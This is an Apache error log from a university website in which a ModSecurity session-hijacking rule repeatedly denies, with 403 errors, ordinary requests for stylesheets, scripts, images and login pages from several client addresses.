[Mon Aug 28 06:51:32.232796 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOvhhMCo-f0AAJHAkCwAAAAY"]
[Mon Aug 28 06:51:32.246194 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOvhhMCo-f0AAJIsP4EAAAAV"]
[Mon Aug 28 06:51:32.292044 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvhhMCo-f0AAJIt8psAAAAW"]
[Mon Aug 28 06:51:32.334852 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOvhhMCo-f0AAJIoaIQAAAAR"]
[Mon Aug 28 06:51:32.407471 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOvhhMCo-f0AAJIsP4IAAAAV"]
[Mon Aug 28 06:51:32.421839 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvhhMCo-f0AAJJZZlYAAAAE"]
[Mon Aug 28 06:51:32.533044 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvhhMCo-f0AAJIfRKEAAAAN"]
[Mon Aug 28 06:51:32.617378 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvhhMCo-f0AAJHAkC4AAAAY"]
[Mon Aug 28 06:51:32.731580 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvhhMCo-f0AAJHB360AAAAD"]
[Mon Aug 28 06:51:32.877141 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvhhMCo-f0AAJHB364AAAAD"]
[Mon Aug 28 06:51:33.026254 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvhhcCo-f0AAJHB368AAAAD"]
[Mon Aug 28 06:51:33.166175 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvhhcCo-f0AAJHB37AAAAAD"]
[Mon Aug 28 06:51:33.187660 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvhhcCo-f0AAJIZRosAAAAF"]
[Mon Aug 28 06:51:33.198730 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvhhcCo-f0AAJJLpjsAAAAA"]
[Mon Aug 28 06:51:33.198904 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvhhcCo-f0AAJIt8p8AAAAW"]
[Mon Aug 28 06:51:33.208128 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvhhcCo-f0AAJIfRKMAAAAN"]
[Mon Aug 28 06:51:33.227886 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvhhcCo-f0AAJJZZlgAAAAE"]
[Mon Aug 28 06:51:33.261532 2023] [:error] [pid 37418] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvhhcCo-f0AAJIqOH0AAAAT"]
[Mon Aug 28 06:51:33.276650 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvhhcCo-f0AAJHB37EAAAAD"]
[Mon Aug 28 06:51:33.285208 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvhhcCo-f0AAJIt8qAAAAAW"]
[Mon Aug 28 06:51:33.306354 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvhhcCo-f0AAJHAkDEAAAAY"]
[Mon Aug 28 06:51:33.318148 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvhhcCo-f0AAJIsP4UAAAAV"]
[Mon Aug 28 06:51:33.431522 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvhhcCo-f0AAJJLpj0AAAAA"]
[Mon Aug 28 06:51:33.536310 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvhhcCo-f0AAJIZRo0AAAAF"]
[Mon Aug 28 06:51:33.646886 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvhhcCo-f0AAJIfRKQAAAAN"]
[Mon Aug 28 06:51:33.740029 2023] [:error] [pid 37312] [client 101.128.68.106] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhhcCo-f0AAJHAkDIAAAAY"]
[Mon Aug 28 06:51:33.751999 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvhhcCo-f0AAJIfRKUAAAAN"]
[Mon Aug 28 06:51:33.906560 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvhhcCo-f0AAJJLpj8AAAAA"]
[Mon Aug 28 06:51:34.026935 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvhhsCo-f0AAJJZZlsAAAAE"]
[Mon Aug 28 06:51:34.116467 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvhhsCo-f0AAJIfRKYAAAAN"]
[Mon Aug 28 06:51:34.527094 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvhhsCo-f0AAJIoaIgAAAAR"]
[Mon Aug 28 06:51:42.592315 2023] [:error] [pid 37416] [client 101.128.69.94] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhjsCo-f0AAJIoaJIAAAAR"]
[Mon Aug 28 06:51:56.291142 2023] [:error] [pid 37465] [client 103.119.55.58] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhnMCo-f0AAJJZZnoAAAAE"]
[Mon Aug 28 06:52:10.819871 2023] [:error] [pid 37407] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvhqsCo-f0AAJIfRNgAAAAN"]
[Mon Aug 28 06:52:10.940750 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhqsCo-f0AAJHAkGQAAAAY"]
[Mon Aug 28 06:52:12.985748 2023] [:error] [pid 37418] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhrMCo-f0AAJIqOM0AAAAT"]
[Mon Aug 28 06:52:13.088149 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhrcCo-f0AAJIZRskAAAAF"]
[Mon Aug 28 06:52:14.120288 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhrsCo-f0AAJIZRssAAAAF"]
[Mon Aug 28 06:52:14.199956 2023] [:error] [pid 37407] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhrsCo-f0AAJIfRN8AAAAN"]
[Mon Aug 28 06:52:15.320232 2023] [:error] [pid 37313] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhr8Co-f0AAJHB3-YAAAAD"]
[Mon Aug 28 06:52:16.162279 2023] [:error] [pid 37499] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhsMCo-f0AAJJ7KRcAAAAB"]
[Mon Aug 28 06:52:16.820135 2023] [:error] [pid 37313] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhsMCo-f0AAJHB3-cAAAAD"]
[Mon Aug 28 06:52:20.753157 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtMCo-f0AAJIZRtIAAAAF"]
[Mon Aug 28 06:52:21.443104 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtcCo-f0AAJHAkHIAAAAY"]
[Mon Aug 28 06:52:22.115468 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhtsCo-f0AAJHAkHQAAAAY"]
[Mon Aug 28 06:52:22.192737 2023] [:error] [pid 37426] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtsCo-f0AAJIyVSkAAAAc"]
[Mon Aug 28 06:52:22.733160 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtsCo-f0AAJHAkHcAAAAY"]
[Mon Aug 28 06:52:23.221875 2023] [:error] [pid 37499] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvht8Co-f0AAJJ7KSQAAAAB"]
[Mon Aug 28 06:52:23.715464 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvht8Co-f0AAJHAkHsAAAAY"]
[Mon Aug 28 06:52:35.209722 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvhw8Co-f0AAJHAkJ4AAAAY"]
[Mon Aug 28 06:52:35.287381 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhw8Co-f0AAJIZRvgAAAAF"]
[Mon Aug 28 06:52:40.665472 2023] [:error] [pid 37426] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvhyMCo-f0AAJIyVVYAAAAc"]
[Mon Aug 28 06:52:40.773422 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhyMCo-f0AAJHAkKkAAAAY"]
[Mon Aug 28 06:52:41.811327 2023] [:error] [pid 37420] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhycCo-f0AAJIsP-0AAAAV"]
[Mon Aug 28 06:52:42.632102 2023] [:error] [pid 37465] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhysCo-f0AAJJZZsgAAAAE"]
[Mon Aug 28 06:53:30.679226 2023] [:error] [pid 37426] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvh@sCo-f0AAJIyVb0AAAAc"]
[Mon Aug 28 06:53:30.680161 2023] [:error] [pid 37407] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvh@sCo-f0AAJIfRXkAAAAN"]
[Mon Aug 28 06:53:30.799922 2023] [:error] [pid 37465] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvh@sCo-f0AAJJZZxMAAAAE"]
[Mon Aug 28 06:54:59.409325 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOviU8Co-f0AAJIqOioAAAAT"]
[Mon Aug 28 06:54:59.411921 2023] [:error] [pid 37465] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOviU8Co-f0AAJJZZ9QAAAAE"]
[Mon Aug 28 06:54:59.420818 2023] [:error] [pid 37499] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOviU8Co-f0AAJJ7Kh4AAAAB"]
[Mon Aug 28 06:54:59.422491 2023] [:error] [pid 37416] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOviU8Co-f0AAJIoagoAAAAR"]
[Mon Aug 28 06:54:59.423069 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOviU8Co-f0AAJIfRiIAAAAN"]
